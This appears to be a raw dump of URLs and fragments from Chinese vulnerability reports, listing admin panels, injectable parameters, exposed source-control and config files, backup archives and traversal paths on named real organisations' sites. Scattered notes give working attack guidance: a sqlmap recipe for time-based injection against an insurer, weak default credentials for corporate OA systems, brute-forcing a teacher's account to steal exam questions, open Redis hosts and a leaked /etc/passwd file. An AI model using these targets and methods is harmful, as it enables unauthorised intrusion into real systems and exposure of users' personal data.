http://haohaochuangtou.com/hetong/11432368769/a273.html http://www.153mh.com/hetong/11380443494/a45.html http://wangdai168.com/hetong/11415843232/a207.html http://domain/hetong/数字/a数字.html http://app.iliangcang.com/.svn/entries http://www.yinzhengjinrong.com/edu/index.php?g=news&m=article&a=page&id=2205 http://www.yinzhengjinrong.com http://www.yinzhengtouzi.com/ http://**.**.**.**/admin/cars/CarManger.aspx http://**.**.**.**/admin/cars/CarManger.aspx http://**.**.**.**/admin/Teacher/TeachList.aspx http://**.**.**.**/admin/Teacher/TeachList.aspx http://**.**.**.**/admin/cars/CarManger.aspx http://**.**.**.**/admin/cars/CarManger.aspx http://jxkh.gtja.com/default/adviser http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/ http://**.**.**.**/ http://**.**.**.**:8081/ http://**.**.**.**/ http://**.**.**.**/ks/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://hui.vcyber.com/comm/showcomm?CommTypeID=1 http://self.uestc.edu.cn:8080 http://www.besttone.com.cn/ http://www.besttone.com.cn/wap/news_xiangqing.php?id=1 http://learningstg.ceair.com/ilearn/get_ila_user.action?user=12657448&Id=200294093&type=O&flag=V http://learningstg.ceair.com/ilearn/get_ila_user.action?user=12657444&Id=200294093&type=O&flag=V http://ady.oa5.meetok.com/handler/goodsearch/goodsearchhandler.ashx?BrandId=-1&method=searchcd&Price=0&Random=0.7027969195041806&TypeId=-1 http://oa.cr13g.com/c6/Jhsoft.Web.login/PassWord.aspx http://oa.cr13g.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://oa.cr13g.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://ilovebi.hiall.com.cn/1.php http://www.ganji.com/pub/pub.php?act=pub&cid=14&domain=gy&method=load http://www.znv.com.cn/sysadmin/Login.aspx http://oec.quanyou.com.cn/prelogin.do http://oa.misshachina.com/ http://oa.misshachina.com/common/update/201571123195238403.aspx http://**.**.**.**/ http://**.**.**.**/Teacher/TeacherPf.aspx?yid=0030 http://**.**.**.**/Teacher/TeacherPf.aspx?yid=0030 http://**.**.**.**/Teacher/TeacherPf.aspx?yid=0030 http://www.wz2sc.com/coms.php?com_title= http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**:8001/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**:8001/workplate/ http://**.**.**.**/workplate/xzsp/kqgl/kqsz/kqsz.aspx http://**.**.**.**/workplate/xzsp/lbsxdict/add.aspx http://**.**.**.**/workplate/base/operation/add.aspx http://www.qhdzfcg.gov.cn/mylogon/product.do http://www.qhdzfcg.gov.cn/mylogon/product.do http://sqlmap.org http://webmail.now.net.cn//mobile/manager/conta http://sqlmap.org http://webmail.now.net.cn:80//mobile/index.php cn:8080 http://web.abcde.cn/webmall/query.php?typeid=2%27 http://www.edutech.com.cn/news.do?method=produc http://sqlmap.org https://**.**.**/esb/account/customer/bankInfo/listcustomerId=14051005& http://**.**.**/upload/attachment5/14051005/00150001/1432363081128.jpg https://**.**.**/esb/account/customer/cardInfo/auditcustomerId=14051005& http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg http://**.**.**/upload/attachment5/14033105/00150001/1432291395569.jpg https://**.**.**/esb/fortune/customer/accountinfocustomerId=14087605& http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/Manage/quyu.aspx http://**.**.**.**/Manage/quyu2.aspx http://**.**.**.**/Manage/quyu_xq.aspx http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**//Manage/News_edit.aspx?id=1 http://www.gfan.com//plus/imageurl.php?p=http://www.apx88.com/webadmin/upload/pic_seckill/info.php%3f%2500.jpg http://wap.yantai.gov.cn http://wap.yantai.gov.cn/ggfw/index_wsms_show.jsp?id=245694 http://119.97.207.217/ http://**.**.**.**:808/admin/index.aspx http://**.**.**.**/admin/index.aspx http://**.**.**.**:81/admin/index.aspx http://**.**.**.**:82/admin/index.aspx http://**.**.**.**/admin/index.aspx http://eservice.95549.cn/eservice/account/register.action?action=initSingle,国华人寿注册用户处,随意输入某个注册用户,点击发送验证码,在手机验证码处随便填入6位数,提交抓包,第一个包是四位图片验证码的,第二个包存在sql注入,用burp抓到第二个包时是POST包,sqlmap跑不了,将此包复制改为GET包存起来,再用sqlmap跑,跑的时候要添加sqlmap的“between"脚本,参数mobile、phone_verification_code、operateType均存在注入,基于时间的sql注入,好慢啊。。。跑了两天,跑出表名共169个。。。 http://eservice.95549.cn/eservice/account/register.action?action=initSingle http://upload.justeasy.cn/ http://mail.hbaas.com/admin/ http://**.**.**.**:8001/paper/submit1.jsp http://**.**.**.**:8080/paper/submit1.jsp http://**.**.**.**:8001/paper/submit1.jsp http://219.143.162.218/htwx/ http://www.chinacses.org:8080/effort/index.action存在命令执行漏洞 http://www.cs12333.com/Online/ http://fotoplace.cc/admin/src/notify/notifies.php http://58.217.99.131:8080/lsxx/portal/index.action存在命令执行漏洞 http://www.tyread.com:8088/manhua/lianhuanhua-10000091550250/index.html?categoryId=10000091550250&type=2&channel=漫画 http://**.**.**.**:7001/netrep/index.jsp http://**.**.**.**:7010/netrep/index.jsp intitle:nClass教学平台 http://**.**.**.** http://passport.anta.cn/index.php?g=user&m=login&a=forgot_password http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath= http://homesecurity.haier.com/HaierAF/login4webapp/login.jsp http://221.179.180.156:9836/HttpApi_Simple/submitMessage http://love.17173.com/dnf http://love.17173.com/ajax/getajaxinfo.php?Work=getUserList&gameid=20011&curpg=1&pagesize=15&gameserver=27&gamebwork=4&gamebwork=4 site:3g.renren.com http://oa.ccib.com.cn/login.asp http://oa.ccib.com.cn/InforForWeb/list.asp?id=123 http://oa.ccib.com.cn/InforForWeb/list.asp http://yt.linekong.com/lottery/panda/vote_xml.php http://yt.linekong.com/ http://218.91.204.132:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d= http://log.iddsms.com:80/ http://219.143.162.218/htwx http://219.143.162.218/htwx/common/easyQueryVer3/EasyQueryXML.jsp http://219.143.162.218/htwx/wxaccounts/WXFollowUserGift.jsp http://cailing.kongzhong.com/WEB-INF/classes/log4j.properties http://cailing.kongzhong.com/WEB-INF/web.xml http://cailing.kongzhong.com//WEB-INF/lib/context-datasource.xml http://219.143.118.86/ZYK/ http://mall.gd10010.cn/component_lib/user/login.do http://manage.gd10010.cn/wcsweb/sysLogin/toLogin.do http://www.huayubaoxian.com/policy/policymgr/taipingyang/edit.asp?policyid=2 http://www.huayubaoxian.com/policy/policymgr/taipingyang/edit.asp?policyid=1148153 IP:119.145.14.47:443 http://wap.zqgx.gov.cn/ckfinder1111/ckfinder.html https://code.csdn.net/dwzteam/dwz_springmvc/issues?closed=0&order= http://admin.tsz.gfan.com/login.php http://m.sinosig.com/mobile/claimreport/carinsurance/car_claim_report!index.action?WT.ac_id=GW_mobile_index_chexianbaoan&needWxShare=true http://219.142.78.170/etrading http://219.141.242.66/htwx/login# http://219.141.242.66/console http://222.85.90.57 http://www.cmccwlan.cn:8006/Manager/Login.aspx www.cmccwlan.cn:8002 http://www.cmccwlan.cn:8002 http://m.haoinvest.com/#user_zhpasst bj.mangocity.com/visa/detail.jsp?visa_basic_info_id=33, http://www.coolpad.com/ http://**.**.**.**/bugs/wooyun-2010-068192 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ www.mangocity.com/index.php/order/order_controller/index index.php/order/order_controller/index http://www.mangocity.com:80/ www.mangocity.com http://shanghai.dianwoba.com/auth/reset_password_01.do site:tf56.com,可获取统一portal入口,如下所示: http://ec.yto.net.cn http://www.cpeinet.com.cn/cpcec/cert/cert_apply_print.jsp?id=15324 http://www.cpeinet.com.cn/cpcec/cert/cert_apply_print.jsp?id=15325 http://**.**.**.**/content.jsp?id=40283c92483458240148346c4f2b0099 http://**.**.**.**/pagelist.jsp?id=40283c924762439001476611aca101fa http://**.**.**.**/pagelist.jsp?id=8a12c19446cbcb6f0146cbdc38550070 http://**.**.**.**/content.jsp?id=8a12c19449ca9e9e014c08116f7616e9 http://**.**.**.**/template/ykz/pagelist.jsp?id=4028813d3fa260f9013fa28ccf62071d http://**.**.**.**/template/ykz/content.jsp?id=4028800641d87b090141e4c5a7e76f44 http://**.**.**.**/pagelist.jsp?id=8a12c19445fd5c5f0146028d63840441 http://**.**.**.**/content.jsp?id=8a12c194482f585901483fc4640f0806 http://**.**.**.**/pagelist.jsp?id=8a12c194468d8ebb0146a2347d881052 http://**.**.**.**/content.jsp?id=8a12c1944c73cd10014cbc1de8290567 http://**.**.**.**/content.jsp?id=297e9e79491710d201491c1229280320 http://**.**.**.**/pageList.jsp?id=4028813e48a1e37a0148a586dc8f00fe http://**.**.**.**/content.jsp?id=40283c924dae0cfb014dc32dbaaa0c16 http://**.**.**.**/pageList.jsp?id=4028813e48a1e37a0148a586dc8f00fe http://115.182.66.150:8082/弱口令一枚,admin https://www.baidu.com/s?ie=UTF-8&wd=inurl%3Ahttp%3A//www.happytoo.cn/seller.line.confirm.html%3Foid= http://www.happytoo.cn/seller.line.confirm.html?oid=549821&mid=148885&cid=19679 http://www.happytoo.cn/seller.line.confirm.html?oid=549445&mid=148885&cid=19679 http://www.happytoo.cn/seller.line.confirm.html?oid=12035&mid=148885&cid=19679 http://www.happytoo.cn/seller.line.confirm.html?oid=688979&mid=148885&cid=19679 www.happytoo.cn http://www4.shaanxi.gov.cn/manager/login.aspx http://119.191.58.179:8090/login.jsp http://app.shzj.gov.cn:443/wzhd/jyjczh/jyjcxx/jdc_xx.jsp?id=12 http://app.shzj.gov.cn:443/wzhd/jyjczh/jyjcxx/jdc_xx.jsp?id=12 http://www.wulanchabu.gov.cn:80/2015/qlqd/ajax.jsp?deptid=%E5%A6%87%E8%81%94&pageSize=12 http://219.226.132.31/zhxt_bks/zhxt_bks.html华北电力科技大学 http://222.194.15.1:7777/zhxt_bks/zhxt_bks.html哈工大威海校区 http://web2.tust.edu.cn:7777/zhxt_bks/zhxt_bks.html http://jwweb.yzu.edu.cn:7777/zhxt_bks/zhxt_bks.html http://202.114.224.81:7777/zhxt_bks/zhxt_bks.html http://211.64.120.50/zhxt_bks/zhxt_bks.html http://210.44.2.167:7777/zhxt_bks/zhxt_bks.html http://jwxt.whcm.edu.cn:8000/zhxt_bks/zhxt_bks.html http://202.113.80.18:7777/zhxt_bks/zhxt_bks.html http://202.207.177.15:7777/zhxt_bks/zhxt_bks.html http://jwweb.yzu.edu.cn:7777/zhxt_bks/zhxt_bks.html jwcweb.lcu.edu.cn/zhxt_bks/zhxt_bks.html聊城大学 jwgl.lnu.edu.cn/zhxt_bks/zhxt_bks.html辽宁大学 http://xuanke.hebut.edu.cn:7777/zhxt_bks/zhxt_bks.html http://202.199.184.40/zhxt_bks/zhxt_bks1.html东北大学 http://202.100.210.140:800/zhxt_bks/zhxt_bks.html海南职业技术学院 http://202.114.224.81:7777/zhxt_bks/zhxt_bks.html http://202.114.224.81:7777/pls/wwwbks/qcb.table_browse?ctable=all_tables&ntable_type=1&ccolumns=*&cclauses=&nrow_min=1&nrow_max=150 http://m.daojia.com.cn/list.php?area=1 http://2013.csztv.cn/event/host/admin/homecon/fenlei index.php/game/searchgame/ http://4007787878.com.cn/Site/FindPassword http://sie.whu.edu.cn/admin.php?s=/public/login.html http://www.gfortune.com.tw:80/ www.gfortune.com.tw http://szts.huatu.com/goods.php?id=5869 http://today.itjuzi.com/product/comment http://today.itjuzi.com/product/subscriber http://today.itjuzi.com/product/zan www.suning.com http://shopping.suning.com/bindCard.do http://www.gtcz.gov.cn/index.php?m=vote&c=index&a=post&subjectid=4&siteid=1 http://202.108.65.139:8080/ http://**.**.**.**/bugs/wooyun-2015-0109795 http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**//sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://183.63.223.82:8080/_pub/gp.jsp?id=545&clsid=G http://60.216.99.136:8810/abc.rar http://dsx.scfai.edu.cn/showinfo2.asp?id=768 http://vod.czgd.cn/player.php?id=10362 http://vod.czgd.cn/memcp.php?action=template_list&id=1 http://vod.czgd.cn/home.php?action=article&id=6 http://218.245.6.116/ http://218.245.6.116/cK/foot.jsp http://www.iliangcang.com/i/ufindpwd/ http://www.sioc-ccbg.ac.cn/tripos/?p=1&a=view&r=206 http://campus.coolpad.com/ http://campus.coolpad.com http://114.80.137.36:8080/,可以看到如下信息。 http://comment.ali213.net/xianshi/pl_xianshi.php?bb=news&id=9 inurl:http://cdcgs.changde.gov.cn/module/ http://cdcgs.changde.gov.cn/module/download/downfile.jsp?classid=0&filename=1312101442116539219.xls http://cdcgs.changde.gov.cn/module/download/downfile.jsp?classid=0&filename=1404101019423379596.xls http://115.182.66.150:8161/admin/index.jsp http://115.182.66.150:8161/hawtio/ http://i.ziroom.com/?uri=contract/seeContract&contract_code=BJCW81506230201 http://**.**.**.**/bugs/wooyun-2015-090966 IP:118.192.93.132 Port:6379 IP:118.192.93.122 Port:6379 IP:118.192.93.113 Port:6379 IP:118.192.93.123 Port:6379 IP:118.192.93.127 Port:6379 IP:118.192.93.236 Port:6379 http://login.jzjt.com/login.jsp http://login.jzjt.com/login.jsp?R1.x=25&R1.y=25&passwd=a&refer=%2Femail.jsp&userid=a* http://dmoa.cofco.com/seeyon/index.jsp,用猪猪侠常用用户名和弱口令123456可获得不少有效账号,登陆后可查看协同工作、公文管理、公共信息、个人事务等,尤其是可查看通讯录,里面包括中粮全公司人员的联系方式。 http://campus.coolpad.com/ http://campus.coolpad.com http://idea.cofco.com/,中粮创意收集管理系统,用户名lxia和弱密码123456可进行登陆。 http://idea.cofco.com/?m=News&a=newsdetails&news_id=118、 http://idea.cofco.com/?m=News&a=activity&news_id=108、http://idea.cofco.com/index.php/Idea_plat/idea_details/id/92484/inde,前两个news_id存在注入,后一个存在伪静态注入。 https://mail.cofco.com IP:60.28.198.61 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin puppet:x:500:500::/home/puppet:/sbin/nologin newmonitor:x:501:501::/Monitor:/bin/bash openvpn:x:498:496:OpenVPN:/etc/openvpn:/sbin/nologin chengang:x:502:502::/home/chengang:/bin/bash happy:x:503:503::/home/happy:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin nagios:x:504:505::/home/nagios:/bin/bash mysql:x:506:506::/home/mysql:/sbin/nologin cacti:x:507:507::/home/cacti:/bin/bash sichuan:x:508:508::/home/sichuan:/bin/bash skyworth:x:509:509::/home/skyworth:/bin/bash tcl:x:510:510::/home/tcl:/bin/bash cmcc:x:511:511::/home/cmcc:/bin/bash chip:x:512:512::/home/chip:/bin/bash guizhou:x:513:513::/home/guizhou:/sbin/nologin scdx:x:514:514::/home/scdx:/bin/bash cqyx:x:515:515::/home/cqyx:/bin/bash omusic:x:516:516::/home/omusic:/bin/bash api2:x:517:517::/home/api2:/bin/bash http://hn.centanet.com/view.aspx?id=13 https://mail.psbc.com exam.hiall.com.cn/exam.hiall.zip http://oa.998.com/login/Login.jsp?logintype=&gopage=&message=18 http://oa.998.com/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27 http://tp.cpicorp.com.cn http://tp.cpicorp.com.cn/index.php?s=/Home/User/register.html http://tp.cpicorp.com.cn/index.php?s=/addon/Vote/Vote/join.html ftp://119.97.249.44/ https://vpn.sdx.js.cn http://jiudian.suning.com http://jiudian.suning.com/hotelpay-web/book3/result/20790.htm http://jiudian.suning.com/hotelpay-web/myHotelOrder/showHotelOrderDetail.htm?hotelOrderId=XXXXX url:http://crm.tv.tcl.com/DRP/ http://login.jzjt.com/contents/oaSys/_setupList.htm http://www.qy01.cn/db.rar http://meeting.minmetals.com.cn/ admin:admin http://www.chuguo.cn/laowu/admin/lw_applyView.aspx?Id=006 http://www.chuguo.cn/laowu/admin/lw_applyView.aspx?Id=007 http://epub.sipo.gov.cn/patent/tdcdesc.action?strWhere=CN103826724A&from=singlemessage&isappinstalled=0 http://epub.sipo.gov.cn/patent/tdcdesc.action?strWhere=CN203631036U ftp://zm.dftm.com.cn/WebHost/ http://zm.dftm.com.cn/ http://mimi.spriteapp.com/.svn/entries http://spriteapp.com/.git/config http://211.157.219.32/irpt/i/main/index.jsp http://211.157.219.32/irpt/i/main/login.jsp http://www.sdsft.gov.cn/sftproject/main.jsp?flag=flzyzgcx http://www.sdsft.gov.cn/sftproject http://58.32.246.85:10000/houtai http://58.32.246.85:10000/houtai/rpt_iqr_day.xls http://58.32.246.85:10000/houtai/announce_imgs/help.php http://www.yichengpin.com/ http://www.yichengpin.com/address/address-getSingleReceiverAddress.do?receiverAdd.userAddressId=129261&opert=edit http://oa.drpeng.com.cn/defaultroot/login.jsp http://www.wooyun.org/bugs/wooyun-2015-0126541/trace/4906d8c41ac7264f21d51c9a3c7d3344 http://jf.ztgame.com/ http://oa.cttqh.com/C6/Jhsoft.Web.login/PassWord.aspx http://oa.cttqh.com/C6/Jhsoft.Web.login/NewView.aspx?ID=10 http://oa.cttqh.com/C6/Jhsoft.Web.login/NewView.aspx?ID=10 http://cms.51hejia.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://mail.10035.com.cn/AppClientUpgrade/admin/adminMain.do https://github.com/effyroth/mac_config/blob/b34c0c50cd681b2a26d02a6a52e91889ced4205e/.zsh_history code.sohuno.com/kzapp code.sohuno.com/kzapp encap:Ethernet b7:33:12 addr:10.110.19.54 Bcast:10.110.19.55 Mask:255.255.255.252 feb7:3312/64 Scope:Link administrator:x:1000:1000:administrator,,,:/home/administrator:/bin/bash administrator:x:0:0:administrator,,,:/home/administrator:/bin/bash www.kuaizhan.com http://63.216.63.34:8080/ http://user.kongfz.com/retrieve/index.html inurl:WebServlet?go=Str= http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_DepositorInfoDetail&depositorIdStr=Vy1OQh5ea5s=xdW9Q6Do2oU=&competentOrganizationIdStr=Vy1OQh5ea5s=JHyaOoVTyZk=&competentOrganization.remark=print http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_DepositorInfoDetail&depositorIdStr=Vy1OQh5ea5s=xdW9Q6Do2oU=&competentOrganizationIdStr=Vy1OQh5ea5s=JHyaOoVTyZk=&competentOrganization.remark=print http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_SignContractDetail&signContractIdStr=Vy1OQh5ea5s=gtFfELZEEBE=&signContract.remark=print_common http://www.bankofshanghai.com/WebServlet?go=shbank_corporateaccount_pg_SignContractDetail&signContractIdStr=Vy1OQh5ea5s=nbBAsbh9l/0=&signContract.remark=print_special http://www.youlu.net/userCenter/forgetPassword/ http://oa.letao.com/wap/app_download.aspx?bid=14&op=brand http://oa.letao.com//wap/shoe.aspx?add=&iid=1 http://**.**.**.**:81/newbook/detail.php?id=0110020237 http://**.**.**.**/newbook/detail.php?id=0200004109 http://**.**.**.**:8080/newbook/detail.php?id=0200021876 http://**.**.**.**/newbook/detail.php?id=0200004232 http://sipo.gov.cn/ http://sipo.gov.cn:80/ http://www.shrc.com.cn/indexWebAction.action中按如图方式操作(点击红框位置) http://www.shrc.com.cn/perResumeAction.action) http://www.shrc.com.cn/perResumeView.action?id=505967) http://idc.jb51.net/clientcenter/news.asp?id=601 http://isafe.xmu.edu.cn http://isafe.xmu.edu.cn/servlet/FileDownLoad?filename=../index.jsp http://isafe.xmu.edu.cn/staticPage_staticPage.action?id=6 www.szsharelink.com是中兴自己开发的支付系统,类似支付宝等等。 http://pm.szsharelink.com是JIRA系统,和网上漏洞类似,可以直接注册账号并登陆: http://www.house5.net/case.html http://smg.cscec1b.net/ http://smg.cscec1b.net:80/ http://dongyuan.hiall.com.cn/s.php ftp://14.204.23.103/ http://haokan.17k.com/WEB-INF/classes/jdbc.properties http://haokan.17k.com/WEB-INF/web.xml http://haokan.17k.com/WEB-INF/classes/log4j.properties http://login.jzjt.com/web/ http://login.jzjt.com/web/site.mdb http://login.jzjt.com/web/site_counts.mdb http://202.202.43.242/2015cjyrecord/ http://202.202.43.242/2015cjyrecord/yj_static/ http://202.202.43.242/2015cjyrecord/yj_static/upload_excel/ http://lsjpk.cncnc.edu.cn/admin/index.asp http://lsjpk.cncnc.edu.cn/info.asp?id=44 http://lsjpk.cncnc.edu.cn/info.asp?id=44 http://61.236.129.245/system/uploadPic.asp http://61.236.129.245/file/ http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://**.**.**.**:8080/pages/offLine/questerOffLineDeal_old.jsp http://223.223.197.242:8888 http://www.wandoujia.com/cloud/#/portal http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1 http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1 http://sqlmap.org http://223.223.197.242:81/console/ http://**.**.**.**/bugs/wooyun-2015-0115361 http://mail.wh.gov.cn/register/user_checkUI.do https://admin1.17u.com https://dy.ly.com http://club.coolpad.com/uc_server/admin.php http://58.68.146.109/ http://58.68.146.109:8090/ www.anxin.com)是君安信(北京)科技有限公司的独立品牌。安心贷成立于2011年,是中国较早开始运营的P2P网贷平台。 http://www.sec1999.com/systemUserJson!checkUserName.action http://zrbg.bcia.com.cn/111.jsp http://59.49.23.3/ http://www.xb.cgdc.com.cn/jmx-console http://passport.bookuu.com/getpassword.php www.picooc.com http://shenbao.gzwater.gov.cn/jhysDataManage/enterpriseDataAction!showQyInfo.action?qyjsqydm=200207578 http://slpc.ahsl.gov.cn/include/content.php?id=748 http://career.sdebank.com/uapws/service/nc.itf.ses.inittool.SESInitToolService?wsdl http://career.sdebank.com/uapws/service/ http://124.127.187.4:8080/qcar/ http://sms.iddsms.com http://user.56.com/sftp-config.json http://cs.now.cn/html/b.php http://hb.189.cn/pages/selfservice/custinfomanager/password/password.jsp http://hb.189.cn//pages/selfservice/custinfomanager/password/newtieinProductresultMusterAction.action http://www.yulinct.com/UF/Uploads/Idcard/ http://m.hundsun.com http://synergy.hundsun.com:89 https://passport.vivo.com.cn/v3/web/findpwd/findPwd http://218.65.95.164:8081/cms/ jdbc:jtds:sqlserver://127.0.0.1:1433/cms jdbc:mysql://localhost:3306/bms?useUnicode=true&characterEncoding=utf-8 jdbc:jtds:sqlserver://192.168.0.125:1433/SmsDB jdbc:jtds:sqlserver://127.0.0.1:1433/dms jdbc:jtds:sqlserver://127.0.0.1:1433/fms http://112.124.57.112/ http://shopping.bcia.com.cn http://61.232.6.108/uapws/service/ http://61.232.6.108/uapws/service/nc.itf.ses.inittool.SESInitToolService?wsdl http://210.75.250.240/CjetMgr/login/login_validate.do http://www.suningcloud.com/ www.suningcloud.com http://www.suningcloud.com http://exam.sunlands.com/portal-war-exam/pt_ea/orderConfirm/viewOrderConfirmPage.action?editFlag=Y&actionFlag=showExamUserInfo&period=201509&orderId=49613 http://exam.sunlands.com/portal-war-exam/pt_ea/orderConfirm/viewOrderConfirmPage.action?editFlag=Y&actionFlag=showExamUserInfo&period=201509&orderId=49614 http://exam.sunlands.com/portal-war-exam/pt_ea/orderConfirm/viewOrderConfirmPage.action?editFlag=Y&actionFlag=showExamUserInfo&period=201509&orderId=49618 http://124.207.179.237/ http://**.**.**.** http://union.baofeng.com/login http://union.baofeng.com/_profiler/empty/search/results?limit=100 http://union.baofeng.com/_profiler/b616dc http://union.baofeng.com/_profiler/60e43b http://union.baofeng.com/_profiler/79e874 http://union.baofeng.com/_profiler/e6a93e http://union.baofeng.com/_profiler/40f295 http://www.guoli.com/cy/index.php?&subject=00&longterm=2 http://www.guoli.com/cy/index.php?&subject=00&longterm=2 http://uc.nearme.com.cn/usercenter/login.jsp?backurl=http%3A%2F%2Fpan.nearme.com.cn&u=http%3A%2F%2Fyun.baidu.com%2Fxcloud%2Fnearme%2Fpan%2F http://gafw.jl.gov.cn/changchun/info.jsp?infoid=14842 http://www.flycua.com/member/auth!getUserInfo.shtml地址会返回用户的真实姓名、手机号。只需要用户在登录状态,不校验referer,没有token,所以可以跨域请求。 http://admin.zhunbai.com/phpmyadmin http://b.cnhubei.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=228aAFIFVgkGVQEEAFMJUQIEAlVQBlVUBwYMUwZCWwIFA0dAEWoHTEINbl9VTwxqe0tnCwoyRkBlPA0Gf3h%2FEFpbNUkNbDBeAF1nc35PcA http://www.longmanenglish.cn/index.html,可通过获取的用户名进行弱口令爆破。某位老师的账号成功爆破出来,提前获取考题。实现一学期不学习成学霸的梦想。 http://124.207.220.61 http://124.207.220.61/images/logo.jpg http://124.207.220.61/staffs/login.do http://124.207.220.61/staffs/;jsessionid=LvqcVlWpmk4Lfb4xPgwNpqgvk11RGpDR6TFBVz15Xfpkq4jhMnxn!-1586081693 http://124.207.220.61/staffs/;jsessionid=LvqcVlWpmk4Lfb4xPgwNpqgvk11RGpDR6TFBVz15Xfpkq4jhMnxn!-1586081693 http://www.yiqifa.com:80/ http://app.metao.com/.git/config https://www.exploit-db.com/exploits/37423/ http://ppcc.ruc.edu.cn/ http://ppcc.ruc.edu.cn//install/hello.php http://124.160.71.245:82/ecms/Admin/ http://124.160.71.245:81/ http://124.160.71.245:81/mydb/ http://124.160.71.245/ http://www.xingyuhotel.com/english/news.php?id=28&typeid=2 http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml 